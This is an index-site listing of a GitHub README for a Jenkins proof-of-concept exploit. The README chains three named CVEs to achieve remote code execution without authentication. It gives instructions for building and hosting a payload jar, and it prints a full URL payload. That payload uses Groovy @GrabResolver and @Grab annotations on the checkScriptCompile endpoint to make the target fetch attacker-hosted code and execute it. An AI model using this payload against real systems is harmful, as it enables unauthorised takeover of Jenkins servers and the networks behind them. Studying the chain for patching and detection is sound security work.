Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/petercunha/jenkins-rce

:smiling_imp: Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
https://github.com/petercunha/jenkins-rce

exploit hacking jenkins orangetw rce unauthenticated

Last synced: 7 days ago
JSON representation

:smiling_imp: Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!

Awesome Lists containing this project

README 

        
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION

---------------------------------------------



Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).



It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!



Read his write-ups on this exploit here -

Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

His github: https://github.com/orangetw



INSTRUCTIONS:

-------------

- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.

- Once that is finished, copy the inner contents of www/ to a webserver.

- In the URL payload, replace  with the hostname of the server, and  to the hostname of where you uploaded your files.



URL Payload:

------------

http:///securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile

?value=

@GrabConfig(disableChecksums=true)%0a

@GrabResolver(name='payload', root='http://')%0a

@Grab(group='package', module='payload', version='1')%0a

import Payload;